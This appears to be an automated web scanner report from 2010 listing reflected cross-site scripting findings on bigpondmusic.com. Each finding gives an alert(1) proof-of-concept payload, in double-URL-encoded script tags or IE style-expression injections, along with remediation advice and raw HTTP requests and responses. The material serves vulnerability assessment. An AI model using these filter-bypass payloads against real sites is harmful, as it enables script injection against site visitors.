This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate74d3c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252702be3f93632 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:13:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88814
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14be1"style%3d"x%3aexpression(alert(1))"da4331ef2ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14be1"style="x:expression(alert(1))"da4331ef2ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate?14be1"style%3d"x%3aexpression(alert(1))"da4331ef2ee=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 182480
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81b08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01ff1a3c713 was submitted in the REST URL parameter 1. This input was echoed as 81b08"><script>alert(1)</script>01ff1a3c713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse81b08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01ff1a3c713/Albums/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88045
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a517c'%3bc57e20244a3 was submitted in the REST URL parameter 1. This input was echoed as a517c';c57e20244a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browsea517c'%3bc57e20244a3/Albums/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87953
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e0de%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f9dc95793b was submitted in the REST URL parameter 2. This input was echoed as 1e0de"><script>alert(1)</script>9f9dc95793b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums1e0de%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f9dc95793b/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973fc'%3ba135ef1b3df was submitted in the REST URL parameter 2. This input was echoed as 973fc';a135ef1b3df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albums973fc'%3ba135ef1b3df/NewRelease/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e98eb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2d7fe67e03a was submitted in the REST URL parameter 3. This input was echoed as e98eb"><script>alert(1)</script>2d7fe67e03a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewReleasee98eb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2d7fe67e03a/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88255
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fdf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527194949c3914 was submitted in the REST URL parameter 3. This input was echoed as 3fdf2'style='x:expression(alert(1))'194949c3914 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease3fdf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527194949c3914/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88269
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45536'%3bfd30ddbd2c3 was submitted in the REST URL parameter 3. This input was echoed as 45536';fd30ddbd2c3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albums/NewRelease45536'%3bfd30ddbd2c3/Format-Album/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ec3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b31d3a53b was submitted in the REST URL parameter 4. This input was echoed as 15ec3"><script>alert(1)</script>6b31d3a53b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album15ec3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b31d3a53b/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88112
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 20c0d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279b7282ad8cf was submitted in the REST URL parameter 4. This input was echoed as 20c0d'style='x:expression(alert(1))'9b7282ad8cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album20c0d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279b7282ad8cf/By-ReleaseDate/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88406
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfd6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1005c5ca468 was submitted in the REST URL parameter 5. This input was echoed as 9dfd6"><script>alert(1)</script>1005c5ca468 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate9dfd6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1005c5ca468/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88406
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56504%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527872ba18650f was submitted in the REST URL parameter 5. This input was echoed as 56504'style='x:expression(alert(1))'872ba18650f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate56504%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527872ba18650f/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:49:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88185
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4554"style%3d"x%3aexpression(alert(1))"10ebfd1a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4554"style="x:expression(alert(1))"10ebfd1a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?c4554"style%3d"x%3aexpression(alert(1))"10ebfd1a26=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 02:48:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 182073
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21295"style%3d"x%3aexpression(alert(1))"b2c9d5ba0bb was submitted in the ref parameter. This input was echoed as 21295"style="x:expression(alert(1))"b2c9d5ba0bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate/?ref=Net-Head-Music-Charts21295"style%3d"x%3aexpression(alert(1))"b2c9d5ba0bb HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 182789
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44700'%3b4c034bcd425 was submitted in the REST URL parameter 1. This input was echoed as 44700';4c034bcd425 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse44700'%3b4c034bcd425/Albums/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88263
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5688%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e051b30ca398 was submitted in the REST URL parameter 1. This input was echoed as e5688"><script>alert(1)</script>051b30ca398 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browsee5688%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e051b30ca398/Albums/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
